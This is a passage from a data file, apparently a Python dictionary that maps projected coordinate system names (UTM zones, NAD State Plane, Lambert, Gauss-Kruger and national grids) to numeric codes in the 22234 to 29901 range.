'Cape_UTM_Zone_34S': 22234, 'Cape_UTM_Zone_35S': 22235, 'Cape_UTM_Zone_36S': 22236, 'Carthage_UTM_Zone_32N': 22332, 'Nord_Tunisie': 22391, 'Sud_Tunisie': 22392, 'Corrego_Alegre_UTM_Zone_21S': 22521, 'Corrego_Alegre_UTM_Zone_22S': 22522, 'Corrego_Alegre_UTM_Zone_23S': 22523, 'Corrego_Alegre_UTM_Zone_24S': 22524, 'Corrego_Alegre_UTM_Zone_25S': 22525, 'Deir_ez_Zor_Levant_Zone': 22700, 'Deir_ez_Zor_Syria_Lambert': 22770, 'Deir_ez_Zor_Levant_Stereographic': 22780, 'Douala_UTM_Zone_32N': 22832, 'Egypt_Blue_Belt': 22991, 'Egypt_Red_Belt': 22992, 'Egypt_Purple_Belt': 22993, 'Egypt_Extended_Purple_Belt': 22994, 'ED_1950_UTM_Zone_28N': 23028, 'ED_1950_UTM_Zone_29N': 23029, 'ED_1950_UTM_Zone_30N': 23030, 'ED_1950_UTM_Zone_31N': 23031, 'ED_1950_UTM_Zone_32N': 23032, 'ED_1950_UTM_Zone_33N': 23033, 'ED_1950_UTM_Zone_34N': 23034, 'ED_1950_UTM_Zone_35N': 23035, 'ED_1950_UTM_Zone_36N': 23036, 'ED_1950_UTM_Zone_37N': 23037, 'ED_1950_UTM_Zone_38N': 23038, 'ED_1950_TM_0_N': 23090, 'ED_1950_TM_5_NE': 23095, 'Fahud_UTM_Zone_39N': 23239, 'Fahud_UTM_Zone_40N': 23240, 'Garoua_UTM_Zone_33N': 23433, 'Hungarian_1972_Egyseges_Orszagos_Vetuleti': 23700, 'DGN_1995_Indonesia_TM-3_Zone_46.2': 23830, 'DGN_1995_Indonesia_TM-3_Zone_47.1': 23831, 'DGN_1995_Indonesia_TM-3_Zone_47.2': 23832, 'DGN_1995_Indonesia_TM-3_Zone_48.1': 23833, 'DGN_1995_Indonesia_TM-3_Zone_48.2': 23834, 'DGN_1995_Indonesia_TM-3_Zone_49.1': 23835, 'DGN_1995_Indonesia_TM-3_Zone_49.2': 23836, 'DGN_1995_Indonesia_TM-3_Zone_50.1': 23837, 'DGN_1995_Indonesia_TM-3_Zone_50.2': 23838, 'DGN_1995_Indonesia_TM-3_Zone_51.1': 23839, 'DGN_1995_Indonesia_TM-3_Zone_51.2': 23840, 'DGN_1995_Indonesia_TM-3_Zone_52.1': 23841, 'DGN_1995_Indonesia_TM-3_Zone_52.2': 23842, 'DGN_1995_Indonesia_TM-3_Zone_53.1': 23843, 'DGN_1995_Indonesia_TM-3_Zone_53.2': 23844, 'DGN_1995_Indonesia_TM-3_Zone_54.1': 23845, 'Indonesian_1974_UTM_Zone_46N': 23846, 'Indonesian_1974_UTM_Zone_47N': 23847, 'Indonesian_1974_UTM_Zone_48N': 23848, 'Indonesian_1974_UTM_Zone_49N': 23849, 'Indonesian_1974_UTM_Zone_50N': 23850, 'Indonesian_1974_UTM_Zone_51N': 23851, 'Indonesian_1974_UTM_Zone_52N': 23852, 'Indonesian_1974_UTM_Zone_53N': 23853, 'DGN_1995_UTM_Zone_46N': 23866, 'DGN_1995_UTM_Zone_47N': 23867, 'DGN_1995_UTM_Zone_48N': 23868, 'DGN_1995_UTM_Zone_49N': 23869, 'DGN_1995_UTM_Zone_50N': 23870, 'DGN_1995_UTM_Zone_51N': 23871, 'DGN_1995_UTM_Zone_52N': 23872, 'DGN_1995_UTM_Zone_47S': 23877, 'DGN_1995_UTM_Zone_48S': 23878, 'DGN_1995_UTM_Zone_49S': 23879, 'DGN_1995_UTM_Zone_50S': 23880, 'DGN_1995_UTM_Zone_51S': 23881, 'DGN_1995_UTM_Zone_52S': 23882, 'DGN_1995_UTM_Zone_53S': 23883, 'DGN_1995_UTM_Zone_54S': 23884, 'Indonesian_1974_UTM_Zone_46S': 23886, 'Indonesian_1974_UTM_Zone_47S': 23887, 'Indonesian_1974_UTM_Zone_48S': 23888, 'Indonesian_1974_UTM_Zone_49S': 23889, 'Indonesian_1974_UTM_Zone_50S': 23890, 'Indonesian_1974_UTM_Zone_51S': 23891, 'Indonesian_1974_UTM_Zone_52S': 23892, 'Indonesian_1974_UTM_Zone_53S': 23893, 'Indonesian_1974_UTM_Zone_54S': 23894, 'Indian_1954_UTM_Zone_46N': 23946, 'Indian_1954_UTM_Zone_47N': 23947, 'Indian_1954_UTM_Zone_48N': 23948, 'Indian_1975_UTM_Zone_47N': 24047, 'Indian_1975_UTM_Zone_48N': 24048, 'Jamaica_1875_Old_Grid': 24100, 'Jamaica_Grid': 24200, 'Kalianpur_1937_UTM_Zone_45N': 24305, 'Kalianpur_1937_UTM_Zone_46N': 24306, 'Kalianpur_1962_UTM_Zone_41N': 24311, 'Kalianpur_1962_UTM_Zone_42N': 24312, 'Kalianpur_1962_UTM_Zone_43N': 24313, 'Kalianpur_1975_UTM_Zone_42N': 24342, 'Kalianpur_1975_UTM_Zone_43N': 24343, 'Kalianpur_1975_UTM_Zone_44N': 24344, 'Kalianpur_1975_UTM_Zone_45N': 24345, 'Kalianpur_1975_UTM_Zone_46N': 24346, 'Kalianpur_1975_UTM_Zone_47N': 24347, 'Kalianpur_1880_India_Zone_0': 24370, 'Kalianpur_1880_India_Zone_I': 24371, 'Kalianpur_1880_India_Zone_IIa': 24372, 'Kalianpur_1880_India_Zone_III': 24373, 'Kalianpur_1880_India_Zone_IV': 24374, 'Kalianpur_1937_India_Zone_IIb': 24375, 'Kalianpur_1962_India_Zone_I': 24376, 'Kalianpur_1962_India_Zone_IIa': 24377, 'Kalianpur_1975_India_Zone_I': 24378, 'Kalianpur_1975_India_Zone_IIa': 24379, 'Kalianpur_1975_India_Zone_IIb': 24380, 'Kalianpur_1975_India_Zone_III': 24381, 'Kalianpur_1880_India_Zone_IIb': 24382, 'Kalianpur_1975_India_Zone_IV': 24383, 'Kertau_Singapore_Grid': 24500, 'Kertau_UTM_Zone_47N': 24547, 'Kertau_UTM_Zone_48N': 24548, 'Kertau_RSO_Malaya_Chains': 24571, 'KOC_Lambert': 24600, 'La_Canoa_UTM_Zone_18N': 24718, 'La_Canoa_UTM_Zone_19N': 24719, 'La_Canoa_UTM_Zone_20N': 24720, 'La_Canoa_UTM_Zone_21N': 24721, 'PSAD_1956_UTM_Zone_17N': 24817, 'PSAD_1956_UTM_Zone_18N': 24818, 'PSAD_1956_UTM_Zone_19N': 24819, 'PSAD_1956_UTM_Zone_20N': 24820, 'PSAD_1956_UTM_Zone_21N': 24821, 'PSAD_1956_UTM_Zone_17S': 24877, 'PSAD_1956_UTM_Zone_18S': 24878, 'PSAD_1956_UTM_Zone_19S': 24879, 'PSAD_1956_UTM_Zone_20S': 24880, 'PSAD_1956_UTM_Zone_21S': 24881, 'PSAD_1956_UTM_Zone_22S': 24882, 'Peru_West_Zone': 24891, 'Peru_Central_Zone': 24892, 'Peru_East_Zone': 24893, 'Ghana_Metre_Grid': 25000, 'Lome_UTM_Zone_31N': 25231, 'Philippines_Zone_I': 25391, 'Philippines_Zone_II': 25392, 'Philippines_Zone_III': 25393, 'Philippines_Zone_IV': 25394, 'Philippines_Zone_V': 25395, 'ETRS_1989_UTM_Zone_28N': 25828, 'ETRS_1989_UTM_Zone_29N': 25829, 'ETRS_1989_UTM_Zone_30N': 25830, 'ETRS_1989_UTM_Zone_31N': 25831, 'ETRS_1989_UTM_Zone_32N': 25832, 'ETRS_1989_UTM_Zone_33N': 25833, 'ETRS_1989_UTM_Zone_34N': 25834, 'ETRS_1989_UTM_Zone_35N': 25835, 'ETRS_1989_UTM_Zone_36N': 25836, 'ETRS_1989_UTM_Zone_37N': 25837, 'ETRS_1989_UTM_Zone_38N': 25838, 'ETRS_1989_TM_Baltic_1993': 25884, 'Malongo_1987_UTM_Zone_32S': 25932, 'Nord_Maroc': 26191, 'Sud_Maroc': 26192, 'Sahara': 26193, 'Merchich_Sahara_Nord': 26194, 'Merchich_Sahara_Sud': 26195, 'Massawa_UTM_Zone_37N': 26237, 'Minna_UTM_Zone_31N': 26331, 'Minna_UTM_Zone_32N': 26332, 'Nigeria_West_Belt': 26391, 'Nigeria_Mid_Belt': 26392, 'Nigeria_East_Belt': 26393, 'Mhast_UTM_Zone_32S': 26432, 'Monte_Mario_Rome_Italy_1': 26591, 'Monte_Mario_Rome_Italy_2': 26592, 'Mporaloko_UTM_Zone_32N': 26632, 'Mporaloko_UTM_Zone_32S': 26692, 'NAD_1927_UTM_Zone_1N': 26701, 'NAD_1927_UTM_Zone_2N': 26702, 'NAD_1927_UTM_Zone_3N': 26703, 'NAD_1927_UTM_Zone_4N': 26704, 'NAD_1927_UTM_Zone_5N': 26705, 'NAD_1927_UTM_Zone_6N': 26706, 'NAD_1927_UTM_Zone_7N': 26707, 'NAD_1927_UTM_Zone_8N': 26708, 'NAD_1927_UTM_Zone_9N': 26709, 'NAD_1927_UTM_Zone_10N': 26710, 'NAD_1927_UTM_Zone_11N': 26711, 'NAD_1927_UTM_Zone_12N': 26712, 'NAD_1927_UTM_Zone_13N': 26713, 'NAD_1927_UTM_Zone_14N': 26714, 'NAD_1927_UTM_Zone_15N': 26715, 'NAD_1927_UTM_Zone_16N': 26716, 'NAD_1927_UTM_Zone_17N': 26717, 'NAD_1927_UTM_Zone_18N': 26718, 'NAD_1927_UTM_Zone_19N': 26719, 'NAD_1927_UTM_Zone_20N': 26720, 'NAD_1927_UTM_Zone_21N': 26721, 'NAD_1927_UTM_Zone_22N': 26722, 'NAD_1927_StatePlane_Alabama_East_FIPS_0101': 26729, 'NAD_1927_StatePlane_Alabama_West_FIPS_0102': 26730, 'NAD_1927_StatePlane_Alaska_1_FIPS_5001': 26731, 'NAD_1927_StatePlane_Alaska_2_FIPS_5002': 26732, 'NAD_1927_StatePlane_Alaska_3_FIPS_5003': 26733, 'NAD_1927_StatePlane_Alaska_4_FIPS_5004': 26734, 'NAD_1927_StatePlane_Alaska_5_FIPS_5005': 26735, 'NAD_1927_StatePlane_Alaska_6_FIPS_5006': 26736, 'NAD_1927_StatePlane_Alaska_7_FIPS_5007': 26737, 'NAD_1927_StatePlane_Alaska_8_FIPS_5008': 26738, 'NAD_1927_StatePlane_Alaska_9_FIPS_5009': 26739, 'NAD_1927_StatePlane_Alaska_10_FIPS_5010': 26740, 'NAD_1927_StatePlane_California_I_FIPS_0401': 26741, 'NAD_1927_StatePlane_California_II_FIPS_0402': 26742, 'NAD_1927_StatePlane_California_III_FIPS_0403': 26743, 'NAD_1927_StatePlane_California_IV_FIPS_0404': 26744, 'NAD_1927_StatePlane_California_V_FIPS_0405': 26745, 'NAD_1927_StatePlane_California_VI_FIPS_0406': 26746, 'NAD_1927_StatePlane_California_VII_FIPS_0407': 26747, 'NAD_1927_StatePlane_Arizona_East_FIPS_0201': 26748, 'NAD_1927_StatePlane_Arizona_Central_FIPS_0202': 26749, 'NAD_1927_StatePlane_Arizona_West_FIPS_0203': 26750, 'NAD_1927_StatePlane_Arkansas_North_FIPS_0301': 26751, 'NAD_1927_StatePlane_Arkansas_South_FIPS_0302': 26752, 'NAD_1927_StatePlane_Colorado_North_FIPS_0501': 26753, 'NAD_1927_StatePlane_Colorado_Central_FIPS_0502': 26754, 'NAD_1927_StatePlane_Colorado_South_FIPS_0503': 26755, 'NAD_1927_StatePlane_Connecticut_FIPS_0600': 26756, 'NAD_1927_StatePlane_Delaware_FIPS_0700': 26757, 'NAD_1927_StatePlane_Florida_East_FIPS_0901': 26758, 'NAD_1927_StatePlane_Florida_West_FIPS_0902': 26759, 'NAD_1927_StatePlane_Florida_North_FIPS_0903': 26760, 'NAD_1927_StatePlane_Hawaii_1_FIPS_5101': 26761, 'NAD_1927_StatePlane_Hawaii_2_FIPS_5102': 26762, 'NAD_1927_StatePlane_Hawaii_3_FIPS_5103': 26763, 'NAD_1927_StatePlane_Hawaii_4_FIPS_5104': 26764, 'NAD_1927_StatePlane_Hawaii_5_FIPS_5105': 26765, 'NAD_1927_StatePlane_Georgia_East_FIPS_1001': 26766, 'NAD_1927_StatePlane_Georgia_West_FIPS_1002': 26767, 'NAD_1927_StatePlane_Idaho_East_FIPS_1101': 26768, 'NAD_1927_StatePlane_Idaho_Central_FIPS_1102': 26769, 'NAD_1927_StatePlane_Idaho_West_FIPS_1103': 26770, 'NAD_1927_StatePlane_Illinois_East_FIPS_1201': 26771, 'NAD_1927_StatePlane_Illinois_West_FIPS_1202': 26772, 'NAD_1927_StatePlane_Indiana_East_FIPS_1301': 26773, 'NAD_1927_StatePlane_Indiana_West_FIPS_1302': 26774, 'NAD_1927_StatePlane_Iowa_North_FIPS_1401': 26775, 'NAD_1927_StatePlane_Iowa_South_FIPS_1402': 26776, 'NAD_1927_StatePlane_Kansas_North_FIPS_1501': 26777, 'NAD_1927_StatePlane_Kansas_South_FIPS_1502': 26778, 'NAD_1927_StatePlane_Kentucky_North_FIPS_1601': 26779, 'NAD_1927_StatePlane_Kentucky_South_FIPS_1602': 26780, 'NAD_1927_StatePlane_Louisiana_North_FIPS_1701': 26781, 'NAD_1927_StatePlane_Louisiana_South_FIPS_1702': 26782, 'NAD_1927_StatePlane_Maine_East_FIPS_1801': 26783, 'NAD_1927_StatePlane_Maine_West_FIPS_1802': 26784, 'NAD_1927_StatePlane_Maryland_FIPS_1900': 26785, 'NAD_1927_StatePlane_Massachusetts_Mainland_FIPS_2001': 26786, 'NAD_1927_StatePlane_Massachusetts_Island_FIPS_2002': 26787, 'NAD_1927_StatePlane_Michigan_North_FIPS_2111': 26788, 'NAD_1927_StatePlane_Michigan_Central_FIPS_2112': 26789, 'NAD_1927_StatePlane_Michigan_South_FIPS_2113': 26790, 'NAD_1927_StatePlane_Minnesota_North_FIPS_2201': 26791, 'NAD_1927_StatePlane_Minnesota_Central_FIPS_2202': 26792, 'NAD_1927_StatePlane_Minnesota_South_FIPS_2203': 26793, 'NAD_1927_StatePlane_Mississippi_East_FIPS_2301': 26794, 'NAD_1927_StatePlane_Mississippi_West_FIPS_2302': 26795, 'NAD_1927_StatePlane_Missouri_East_FIPS_2401': 26796, 'NAD_1927_StatePlane_Missouri_Central_FIPS_2402': 26797, 'NAD_1927_StatePlane_Missouri_West_FIPS_2403': 26798, 'NAD_1927_StatePlane_California_VII_FIPS_0407': 26799, 'NAD_Michigan_StatePlane_Michigan_East_Old_FIPS_2101': 26801, 'NAD_Michigan_StatePlane_Michigan_Central_Old_FIPS_2102': 26802, 'NAD_Michigan_StatePlane_Michigan_West_Old_FIPS_2103': 26803, 'NAD_Michigan_StatePlane_Michigan_North_FIPS_2111': 26811, 'NAD_Michigan_StatePlane_Michigan_Central_FIPS_2112': 26812, 'NAD_Michigan_StatePlane_Michigan_South_FIPS_2113': 26813, 'NAD_1983_UTM_Zone_1N': 26901, 'NAD_1983_UTM_Zone_2N': 26902, 'NAD_1983_UTM_Zone_3N': 26903, 'NAD_1983_UTM_Zone_4N': 26904, 'NAD_1983_UTM_Zone_5N': 26905, 'NAD_1983_UTM_Zone_6N': 26906, 'NAD_1983_UTM_Zone_7N': 26907, 'NAD_1983_UTM_Zone_8N': 26908, 'NAD_1983_UTM_Zone_9N': 26909, 'NAD_1983_UTM_Zone_10N': 26910, 'NAD_1983_UTM_Zone_11N': 26911, 'NAD_1983_UTM_Zone_12N': 26912, 'NAD_1983_UTM_Zone_13N': 26913, 'NAD_1983_UTM_Zone_14N': 26914, 'NAD_1983_UTM_Zone_15N': 26915, 'NAD_1983_UTM_Zone_16N': 26916, 'NAD_1983_UTM_Zone_17N': 26917, 'NAD_1983_UTM_Zone_18N': 26918, 'NAD_1983_UTM_Zone_19N': 26919, 'NAD_1983_UTM_Zone_20N': 26920, 'NAD_1983_UTM_Zone_21N': 26921, 'NAD_1983_UTM_Zone_22N': 26922, 'NAD_1983_UTM_Zone_23N': 26923, 'NAD_1983_StatePlane_Alabama_East_FIPS_0101': 26929, 'NAD_1983_StatePlane_Alabama_West_FIPS_0102': 26930, 'NAD_1983_StatePlane_Alaska_1_FIPS_5001': 26931, 'NAD_1983_StatePlane_Alaska_2_FIPS_5002': 26932, 'NAD_1983_StatePlane_Alaska_3_FIPS_5003': 26933, 'NAD_1983_StatePlane_Alaska_4_FIPS_5004': 26934, 'NAD_1983_StatePlane_Alaska_5_FIPS_5005': 26935, 'NAD_1983_StatePlane_Alaska_6_FIPS_5006': 26936, 'NAD_1983_StatePlane_Alaska_7_FIPS_5007': 26937, 'NAD_1983_StatePlane_Alaska_8_FIPS_5008': 26938, 'NAD_1983_StatePlane_Alaska_9_FIPS_5009': 26939, 'NAD_1983_StatePlane_Alaska_10_FIPS_5010': 26940, 'NAD_1983_StatePlane_California_I_FIPS_0401': 26941, 'NAD_1983_StatePlane_California_II_FIPS_0402': 26942, 'NAD_1983_StatePlane_California_III_FIPS_0403': 26943, 'NAD_1983_StatePlane_California_IV_FIPS_0404': 26944, 'NAD_1983_StatePlane_California_V_FIPS_0405': 26945, 'NAD_1983_StatePlane_California_VI_FIPS_0406': 26946, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201': 26948, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202': 26949, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203': 26950, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301': 26951, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302': 26952, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501': 26953, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502': 26954, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503': 26955, 'NAD_1983_StatePlane_Connecticut_FIPS_0600': 26956, 'NAD_1983_StatePlane_Delaware_FIPS_0700': 26957, 'NAD_1983_StatePlane_Florida_East_FIPS_0901': 26958, 'NAD_1983_StatePlane_Florida_West_FIPS_0902': 26959, 'NAD_1983_StatePlane_Florida_North_FIPS_0903': 26960, 'NAD_1983_StatePlane_Hawaii_1_FIPS_5101': 26961, 'NAD_1983_StatePlane_Hawaii_2_FIPS_5102': 26962, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103': 26963, 'NAD_1983_StatePlane_Hawaii_4_FIPS_5104': 26964, 'NAD_1983_StatePlane_Hawaii_5_FIPS_5105': 26965, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001': 26966, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002': 26967, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101': 26968, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102': 26969, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103': 26970, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201': 26971, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202': 26972, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301': 26973, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302': 26974, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401': 26975, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402': 26976, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501': 26977, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502': 26978, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601': 26979, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602': 26980, 'NAD_1983_StatePlane_Louisiana_North_FIPS_1701': 26981, 'NAD_1983_StatePlane_Louisiana_South_FIPS_1702': 26982, 'NAD_1983_StatePlane_Maine_East_FIPS_1801': 26983, 'NAD_1983_StatePlane_Maine_West_FIPS_1802': 26984, 'NAD_1983_StatePlane_Maryland_FIPS_1900': 26985, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001': 26986, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002': 26987, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111': 26988, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112': 26989, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113': 26990, 'NAD_1983_StatePlane_Minnesota_North_FIPS_2201': 26991, 'NAD_1983_StatePlane_Minnesota_Central_FIPS_2202': 26992, 'NAD_1983_StatePlane_Minnesota_South_FIPS_2203': 26993, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301': 26994, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302': 26995, 'NAD_1983_StatePlane_Missouri_East_FIPS_2401': 26996, 'NAD_1983_StatePlane_Missouri_Central_FIPS_2402': 26997, 'NAD_1983_StatePlane_Missouri_West_FIPS_2403': 26998, 'Nahrwan_1967_UTM_Zone_37N': 27037, 'Nahrwan_1967_UTM_Zone_38N': 27038, 'Nahrwan_1967_UTM_Zone_39N': 27039, 'Nahrwan_1967_UTM_Zone_40N': 27040, 'Naparima_1972_UTM_Zone_20N': 27120, 'GD_1949_New_Zealand_Map_Grid': 27200, 'NZGD_1949_Mount_Eden_Circuit': 27205, 'NZGD_1949_Bay_of_Plenty_Circuit': 27206, 'NZGD_1949_Poverty_Bay_Circuit': 27207, 'NZGD_1949_Hawkes_Bay_Circuit': 27208, 'NZGD_1949_Taranaki_Circuit': 27209, 'NZGD_1949_Tuhirangi_Circuit': 27210, 'NZGD_1949_Wanganui_Circuit': 27211, 'NZGD_1949_Wairarapa_Circuit': 27212, 'NZGD_1949_Wellington_Circuit': 27213, 'NZGD_1949_Collingwood_Circuit': 27214, 'NZGD_1949_Nelson_Circuit': 27215, 'NZGD_1949_Karamea_Circuit': 27216, 'NZGD_1949_Buller_Circuit': 27217, 'NZGD_1949_Grey_Circuit': 27218, 'NZGD_1949_Amuri_Circuit': 27219, 'NZGD_1949_Marlborough_Circuit': 27220, 'NZGD_1949_Hokitika_Circuit': 27221, 'NZGD_1949_Okarito_Circuit': 27222, 'NZGD_1949_Jacksons_Bay_Circuit': 27223, 'NZGD_1949_Mount_Pleasant_Circuit': 27224, 'NZGD_1949_Gawler_Circuit': 27225, 'NZGD_1949_Timaru_Circuit': 27226, 'NZGD_1949_Lindis_Peak_Circuit': 27227, 'NZGD_1949_Mount_Nicholas_Circuit': 27228, 'NZGD_1949_Mount_York_Circuit': 27229, 'NZGD_1949_Observation_Point_Circuit': 27230, 'NZGD_1949_North_Taieri_Circuit': 27231, 'NZGD_1949_Bluff_Circuit': 27232, 'NZGD_1949_UTM_Zone_58S': 27258, 'NZGD_1949_UTM_Zone_59S': 27259, 'NZGD_1949_UTM_Zone_60S': 27260, 'New_Zealand_North_Island': 27291, 'New_Zealand_South_Island': 27292, 'NGO_1948_Oslo_Norway_Zone_1': 27391, 'NGO_1948_Oslo_Norway_Zone_2': 27392, 'NGO_1948_Oslo_Norway_Zone_3': 27393, 'NGO_1948_Oslo_Norway_Zone_4': 27394, 'NGO_1948_Oslo_Norway_Zone_5': 27395, 'NGO_1948_Oslo_Norway_Zone_6': 27396, 'NGO_1948_Oslo_Norway_Zone_7': 27397, 'NGO_1948_Oslo_Norway_Zone_8': 27398, 'Datum_73_UTM_Zone_29N': 27429, 'Datum_73_Modified_Portuguese_Grid': 27492, 'Nord_de_Guerre': 27500, 'NTF_Paris_Lambert_Nord_France': 27561, 'NTF_Paris_Lambert_Centre_France': 27562, 'NTF_Paris_Lambert_Sud_France': 27563, 'NTF_Paris_Lambert_Corse': 27564, 'NTF_Paris_Lambert_Zone_I': 27571, 'NTF_Paris_Lambert_Zone_II': 27572, 'NTF_Paris_Lambert_Zone_III': 27573, 'NTF_Paris_Lambert_Zone_IV': 27574, 'NTF_Paris_France_I': 27581, 'NTF_Paris_France_II': 27582, 'NTF_Paris_France_III': 27583, 'NTF_Paris_France_IV': 27584, 'NTF_Paris_Nord_France': 27591, 'NTF_Paris_Centre_France': 27592, 'NTF_Paris_Sud_France': 27593, 'NTF_Paris_Corse': 27594, 'British_National_Grid': 27700, 'Palestine_1923_Palestine_Grid': 28191, 'Palestine_1923_Palestine_Belt': 28192, 'Palestine_1923_Israel_CS_Grid': 28193, 'Pointe_Noire_UTM_Zone_32S': 28232, 'GDA_1994_MGA_Zone_48': 28348, 'GDA_1994_MGA_Zone_49': 28349, 'GDA_1994_MGA_Zone_50': 28350, 'GDA_1994_MGA_Zone_51': 28351, 'GDA_1994_MGA_Zone_52': 28352, 'GDA_1994_MGA_Zone_53': 28353, 'GDA_1994_MGA_Zone_54': 28354, 'GDA_1994_MGA_Zone_55': 28355, 'GDA_1994_MGA_Zone_56': 28356, 'GDA_1994_MGA_Zone_57': 28357, 'GDA_1994_MGA_Zone_58': 28358, 'Pulkovo_1942_GK_Zone_2': 28402, 'Pulkovo_1942_GK_Zone_3': 28403, 'Pulkovo_1942_GK_Zone_4': 28404, 'Pulkovo_1942_GK_Zone_5': 28405, 'Pulkovo_1942_GK_Zone_6': 28406, 'Pulkovo_1942_GK_Zone_7': 28407, 'Pulkovo_1942_GK_Zone_8': 28408, 'Pulkovo_1942_GK_Zone_9': 28409, 'Pulkovo_1942_GK_Zone_10': 28410, 'Pulkovo_1942_GK_Zone_11': 28411, 'Pulkovo_1942_GK_Zone_12': 28412, 'Pulkovo_1942_GK_Zone_13': 28413, 'Pulkovo_1942_GK_Zone_14': 28414, 'Pulkovo_1942_GK_Zone_15': 28415, 'Pulkovo_1942_GK_Zone_16': 28416, 'Pulkovo_1942_GK_Zone_17': 28417, 'Pulkovo_1942_GK_Zone_18': 28418, 'Pulkovo_1942_GK_Zone_19': 28419, 'Pulkovo_1942_GK_Zone_20': 28420, 'Pulkovo_1942_GK_Zone_21': 28421, 'Pulkovo_1942_GK_Zone_22': 28422, 'Pulkovo_1942_GK_Zone_23': 28423, 'Pulkovo_1942_GK_Zone_24': 28424, 'Pulkovo_1942_GK_Zone_25': 28425, 'Pulkovo_1942_GK_Zone_26': 28426, 'Pulkovo_1942_GK_Zone_27': 28427, 'Pulkovo_1942_GK_Zone_28': 28428, 'Pulkovo_1942_GK_Zone_29': 28429, 'Pulkovo_1942_GK_Zone_30': 28430, 'Pulkovo_1942_GK_Zone_31': 28431, 'Pulkovo_1942_GK_Zone_32': 28432, 'Pulkovo_1942_GK_Zone_2N': 28462, 'Pulkovo_1942_GK_Zone_3N': 28463, 'Pulkovo_1942_GK_Zone_4N': 28464, 'Pulkovo_1942_GK_Zone_5N': 28465, 'Pulkovo_1942_GK_Zone_6N': 28466, 'Pulkovo_1942_GK_Zone_7N': 28467, 'Pulkovo_1942_GK_Zone_8N': 28468, 'Pulkovo_1942_GK_Zone_9N': 28469, 'Pulkovo_1942_GK_Zone_10N': 28470, 'Pulkovo_1942_GK_Zone_11N': 28471, 'Pulkovo_1942_GK_Zone_12N': 28472, 'Pulkovo_1942_GK_Zone_13N': 28473, 'Pulkovo_1942_GK_Zone_14N': 28474, 'Pulkovo_1942_GK_Zone_15N': 28475, 'Pulkovo_1942_GK_Zone_16N': 28476, 'Pulkovo_1942_GK_Zone_17N': 28477, 'Pulkovo_1942_GK_Zone_18N': 28478, 'Pulkovo_1942_GK_Zone_19N': 28479, 'Pulkovo_1942_GK_Zone_20N': 28480, 'Pulkovo_1942_GK_Zone_21N': 28481, 'Pulkovo_1942_GK_Zone_22N': 28482, 'Pulkovo_1942_GK_Zone_23N': 28483, 'Pulkovo_1942_GK_Zone_24N': 28484, 'Pulkovo_1942_GK_Zone_25N': 28485, 'Pulkovo_1942_GK_Zone_26N': 28486, 'Pulkovo_1942_GK_Zone_27N': 28487, 'Pulkovo_1942_GK_Zone_28N': 28488, 'Pulkovo_1942_GK_Zone_29N': 28489, 'Pulkovo_1942_GK_Zone_30N': 28490, 'Pulkovo_1942_GK_Zone_31N': 28491, 'Pulkovo_1942_GK_Zone_32N': 28492, 'Qatar_National_Grid': 28600, 'RD_Old': 28991, 'RD_New': 28992, 'SAD_1969_Brazil_Polyconic': 29100, 'SAD_1969_Brazil_Polyconic': 29101, 'SAD_1969_UTM_Zone_18N': 29118, 'SAD_1969_UTM_Zone_19N': 29119, 'SAD_1969_UTM_Zone_20N': 29120, 'SAD_1969_UTM_Zone_21N': 29121, 'SAD_1969_UTM_Zone_22N': 29122, 'SAD_1969_UTM_Zone_18N': 29168, 'SAD_1969_UTM_Zone_19N': 29169, 'SAD_1969_UTM_Zone_20N': 29170, 'SAD_1969_UTM_Zone_21N': 29171, 'SAD_1969_UTM_Zone_22N': 29172, 'SAD_1969_UTM_Zone_17S': 29177, 'SAD_1969_UTM_Zone_18S': 29178, 'SAD_1969_UTM_Zone_19S': 29179, 'SAD_1969_UTM_Zone_20S': 29180, 'SAD_1969_UTM_Zone_21S': 29181, 'SAD_1969_UTM_Zone_22S': 29182, 'SAD_1969_UTM_Zone_23S': 29183, 'SAD_1969_UTM_Zone_24S': 29184, 'SAD_1969_UTM_Zone_25S': 29185, 'SAD_1969_UTM_Zone_17S': 29187, 'SAD_1969_UTM_Zone_18S': 29188, 'SAD_1969_UTM_Zone_19S': 29189, 'SAD_1969_UTM_Zone_20S': 29190, 'SAD_1969_UTM_Zone_21S': 29191, 'SAD_1969_UTM_Zone_22S': 29192, 'SAD_1969_UTM_Zone_23S': 29193, 'SAD_1969_UTM_Zone_24S': 29194, 'SAD_1969_UTM_Zone_25S': 29195, 'Sapper_Hill_1943_UTM_Zone_20S': 29220, 'Sapper_Hill_1943_UTM_Zone_21S': 29221, 'Schwarzeck_UTM_Zone_33S': 29333, 'Sudan_UTM_Zone_35N': 29635, 'Sudan_UTM_Zone_36N': 29636, 'Tananarive_1925_UTM_Zone_38S': 29738, 'Tananarive_1925_UTM_Zone_39S': 29739, 'Timbalai_1948_UTM_Zone_49N': 29849, 'Timbalai_1948_UTM_Zone_50N': 29850, 'Timbalai_1948_RSO_Borneo_Chains': 29871, 'Timbalai_1948_RSO_Borneo_Feet': 29872, 'Timbalai_1948_RSO_Borneo_Meters': 29873, 'TM65_Irish_Grid': 29900, 'OSNI_1952_Irish_National_Grid': 29901, 